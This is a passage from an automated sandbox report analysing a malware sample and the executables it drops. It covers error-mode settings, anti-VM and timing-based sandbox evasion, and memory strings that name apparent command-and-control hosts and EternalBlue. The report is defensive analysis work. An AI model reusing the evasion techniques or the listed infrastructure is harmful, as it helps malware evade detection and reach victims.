            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: , S.BASE()=, S.NPAGES=, SETTINGS:.WITHCANCEL/API/REPORT/APP/VC.EXE/DEV/STDERR/DEV/STDOUT/INDEX.HTML30517578125: FRAME.SP=; MAX-AGE=0<INVALID OPBAD GATEWAYBAD REQUESTCLASSHESIODCLOSEHANDLECLOSEWINDOWCOGETOBJECTCOOKIE.PATHCREATEFILEWDELETEFILEWDISPLAYNAMEE-X.NOT.FYIENABLE_PUSHEND_HEADERSEARLY HINTSENUMWINDOWSEXITPROCESSFREELIBRARYGOTRACEBACKGETFILESIZEGETFILETYPEGETMESSAGEWHTTPS_PROXYISO 8859-10ISO 8859-13ISO 8859-14ISO 8859-15ISO 8859-16ISO-8859-6EISO-8859-6IISO-8859-8EISO-8859-8IIDEOGRAPHICIN-REPLY-TOINSTCAPTUREINSTRUNEANYINSTALLDATEMACHINEGUIDMEDEFAIDRINMESSAGEBOXWMOVEFILEEXWNETSHAREADDNETSHAREDELNEW_TAI_LUEOLD_PERSIANOLD_SOGDIANOPENPROCESSPRIVATE KEYPAU_CIN_HAUREGCLOSEKEYRETURN-PATHSYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDERWINDOWS 874[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONATTACK_TYPEBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGETPEERNAMEGETSOCKNAMEHOST IS NILHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTNOTIFY-HOSTORANNIS.COMRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECUR32.DLLSHELL32.DLLSHORT WRITETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUPDATE-DATAUPLOAD-FILEUSERENV.DLLVERSION=179VM DETECTEDVMUSRVC.EXEWININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe RDTSC instruction interceptor: First address: 0000000000401D11 second address: 0000000000401D11 instructions: 0x00000000 rdtsc 0x00000002 movzx edx, al 0x00000005 cmp edx, 00000000h 0x00000008 jbe 00007F4158C5E200h 0x0000000a cmp edx, 10h 0x0000000d jnc 00007F4158C5E1FBh 0x0000000f cmp edx, 0Fh 0x00000012 jbe 00007F4158C5E200h 0x00000014 cmp edx, 20h 0x00000017 jnc 00007F4158C5E1FBh 0x00000019 cmp edx, 1Fh 0x0000001c jbe 00007F4158C5E200h 0x0000001e cmp edx, 30h 0x00000021 jnc 00007F4158C5E1FBh 0x00000023 cmp edx, 2Fh 0x00000026 jbe 00007F4158C5E200h 0x00000028 cmp edx, 40h 0x0000002b jnc 00007F4158C5E1FBh 0x0000002d cmp edx, 3Fh 0x00000030 jbe 00007F4158C5E200h 0x00000032 cmp edx, 50h 0x00000035 jnc 00007F4158C5E1FBh 0x00000037 cmp edx, 4Fh 0x0000003a jbe 00007F4158C5E200h 0x0000003c cmp edx, 60h 0x0000003f jnc 00007F4158C5E1FBh 0x00000041 cmp edx, 5Fh 0x00000044 jbe 00007F4158C5E200h 0x00000046 cmp edx, 70h 0x00000049 jnc 00007F4158C5E1FBh 0x0000004b mov al, 37h 0x0000004d mov bl, 6Fh 0x0000004f jmp 00007F4158C5E2A9h 0x00000054 mov byte ptr [esi], bl 0x00000056 inc esi 0x00000057 stosb 0x00000058 dec ecx 0x00000059 jne 00007F4158C5E0ADh 0x0000005f rdtsc
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Code function: 13_2_00401B70 rdtsc 13_2_00401B70
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_Deallocate,17_2_010AE466
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Thread delayed: delay time: 1800000
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe Thread delayed: delay time: 1800000
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KTTI2.tmp\installer.tmp
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe Dropped PE file which has not been started: C:\Program Files\89C8W4UQTF\uninstaller.exe
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\NoikfEU1.exe
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe Registry key enumerated: More than 172 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe TID: 5932 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe TID: 6384 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 5596 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 5980 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 4824 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 6820 Thread sleep time: -3600000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 4780 Thread sleep count: 308 > 30
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 4780 Thread sleep time: -308000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 4112 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 2240 Thread sleep time: -1800000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe TID: 6816 Thread sleep count: 33 > 30
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe TID: 5968 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe TID: 5784 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe TID: 3984 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe TID: 5048 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe TID: 6944 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe TID: 6944 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe TID: 5564 Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe File opened: PhysicalDrive0
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_010A5969 FindFirstFileW,FindNextFileW,FindClose,17_2_010A5969
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01039290 FindFirstFileExW,17_2_01039290
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_0040AEF4 FindFirstFileW,FindClose,18_2_0040AEF4
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe Code function: 18_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,18_2_0040A928
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe Code function: 17_2_01046F37 GetSystemInfo,17_2_01046F37
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: entersyscalleternalblue:event-existsexit status found av: %sgcpacertraceget_app_namegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmutex-existsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangepointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffertransmitfileulrichard.chunexpected )unknown portunknown typevmtoolsd.exewatchdog.exewinlogon.exewirep: p->m=wtsapi32.dll != sweepgen MB released
            Source: multitimer.exe, 00000002.00000002.669864680.000000001B448000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmp Binary or memory string: *)HKEY_CLASSES_ROOT\Software\VMware, Inc.\.
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmp Binary or memory string: *)HKEY_CURRENT_USER\Software\VMware, Inc.\.
            Source: multitimer.exe, 00000004.00000003.901056768.000000001D675000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: is unavailable%d smbtest done()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCDN updated: %sCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWData[exploited]DefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommandLineWGetProcessTimesGetSecurityInfoGetStartupInfoWHanifi_RohingyaIdempotency-KeyImpersonateSelfLength RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For]
            Source: svchost.exe, 00000000.00000002.653105667.0000026176880000.00000002.00000001.sdmp, SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp, multitimer.exe, 00000002.00000002.670146862.000000001B920000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.709320382.0000029B32140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.735872158.00000233DE690000.00000002.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.834064929.000000001B090000.00000002.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.768624246.000000001B650000.00000002.00000001.sdmp, installer.exe, 00000012.00000002.817568106.00000000009A0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: 2mqvpn30gyk.exe Binary or memory string: cKubsOJRr+jDp4sTOOFjNgfVR6FVb2zOYk0kRrNraSS32liHubWa/5y9wWHivumYVTvF7djSOeZ+Kot4wEj4In4kvMCIcdU+ZDN2TOJ2e752O9T/MaURPdBiM6F4Q16/MHG5trlSzceSN1EpgNyh/0wHul46QeVA+GnLu2tXCw3JSpm/EqSxVDdVHZBSl1qMv9btbwanaErsBth2TZZ1WW8GyfKWBctQarqcCXoazEEVBLm1EkrAwTf3UiDelQ37YUSC
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmp Binary or memory string: #"HKEY_USERS\Software\VMware, Inc.\.
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: /app/app.exe100-continue152587890625762939453125Bidi_ControlCDN is emptyCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512FindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocWindows 1250Windows 1251Windows 1252Windows 1253Windows 1254Windows 1255Windows 1256Windows 1257Windows 1258Winmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
            Source: tpwlxkeo40z.exe, 0000000F.00000002.754969058.00000000009EE000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
            Source: svchost.exe, 00000000.00000002.653105667.0000026176880000.00000002.00000001.sdmp, SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp, multitimer.exe, 00000002.00000002.670146862.000000001B920000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.709320382.0000029B32140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.735872158.00000233DE690000.00000002.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.834064929.000000001B090000.00000002.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.768624246.000000001B650000.00000002.00000001.sdmp, installer.exe, 00000012.00000002.817568106.00000000009A0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: multitimer.exe, 0000000B.00000003.888125730.0000000000A6E000.00000004.00000001.sdmp Binary or memory string: y\Machine\Software\Classes\Software\VMware, Inc.
            Source: 2mqvpn30gyk.exe, 0000000E.00000002.742302893.0000000000979000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: multitimer.exe, 00000008.00000002.721758678.00000000012FC000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648374462.0000000000D05000.00000004.00000020.sdmp, multitimer.exe, 00000002.00000002.668223534.0000000000B6C000.00000004.00000020.sdmp, multitimer.exe, 0000000B.00000003.850493442.0000000000A2A000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.742226663.0000000000967000.00000004.00000020.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.754762916.000000000098A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: multitimer.exe, 00000008.00000002.806587601.000000001BE50000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldM)
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp Binary or memory string: unknown network verify-signatureworkbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)%d-%02d-%02d %02d/bots/update-data0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCreateStdDispatchData[compaign_id]DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIBM Code Page 037IBM Code Page 437IBM Code Page 850IBM Code Page 852IBM Code Page 855IBM Code Page 860IBM Code Page 862IBM Code Page 863IBM Code Page 865IBM Code Page 866If-Modified-SinceLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't hide WUPcouldn't hide appcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfilename is emptyfractional secondget-logfile-proxygp.waiting != nilgroom_allocationshandshake failureif-modified-sinceillegal parameterin string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad 